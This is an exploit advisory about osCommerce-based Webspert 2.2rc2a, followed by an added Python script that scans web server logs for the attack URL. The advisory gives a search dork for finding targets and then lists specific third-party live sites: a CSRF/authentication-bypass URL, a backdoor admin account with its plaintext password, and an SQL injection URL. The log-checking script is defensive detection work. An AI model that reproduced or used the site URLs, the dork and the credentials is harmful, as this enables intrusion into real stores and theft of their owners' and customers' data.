========================================================================
| # Title : Webspert 2.2rc2a osCommerce Multiple Vulnerabilities
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : Windows 8.1 French version (Pro)
| # Version : 2.2rc2a
| # Vendor : http://www.webspert.com.my/
| # Dork : "Powered by Webspert"
========================================================================
PoC :
Webspert is based on osCommerce version 2.2rc2a (2007), and
osCommerce version 2.2rc2a suffers from a cross-site request forgery vulnerability: https://packetstormsecurity.com/files/92311/osCommerce-2.2rc2a-Cross-Site-Request-Forgery.html
So:
1 - CSRF :
http://www.kamazingart.com/private/backup.php/login.php
2 - Backdoor account :
http://www.kamazingart.com/private/
user : admin
Pass : conny123@
SQL injection :
http://www.sarayazahret.com/page.php?pageid=33
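
Added example, not part of the original advisory: a log check a site owner can run for the URL shape shown in item 1, an admin script followed by /login.php as trailing path info. The function name suspicious_requests, the sample log lines, the IP addresses and the paths are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a combined-format access log line: "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A .php script followed by /login.php as trailing path info (the shape in item 1)
PATHINFO_RE = re.compile(r'/(?P<script>[^/]+\.php)/login\.php/?$', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, made-up paths)
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2015:13:55:36 +0000] "GET /admin/login.php HTTP/1.1" 200 2326',
    '203.0.113.7 - - [10/Oct/2015:13:55:40 +0000] "GET /admin/backup.php/login.php HTTP/1.1" 200 5120',
    '198.51.100.23 - - [10/Oct/2015:14:02:11 +0000] "POST /shop/admin/orders.php/login.php?page=2 HTTP/1.1" 302 0',
    '192.0.2.10 - - [10/Oct/2015:14:05:00 +0000] "GET /admin/backup.php HTTP/1.1" 302 0',
    '198.51.100.23 - - [10/Oct/2015:14:06:30 +0000] "GET /admin/categories.php%2Flogin.php HTTP/1.1" 404 0',
]

def suspicious_requests(lines):
    """Return (client, method, script, status) for each request whose path
    ends in <script>.php/login.php, where <script> is not login.php itself."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m is None:
            continue  # not a parseable request line
        # Drop the query string, decode %2F-style escapes, collapse repeated slashes
        path = unquote(m.group("target").split("?", 1)[0])
        path = re.sub(r"/{2,}", "/", path)
        p = PATHINFO_RE.search(path)
        if p and p.group("script").lower() != "login.php":
            client = line.split(" ", 1)[0]
            hits.append((client, m.group("method"), p.group("script"), int(m.group("status"))))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Hits answered with 200 rather than a redirect to the login page are the ones to review first.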
========================================================================
Greetz : jericho * Larry W. Cashdollar * moncet-1 * Gjoko Krstic
========================================================================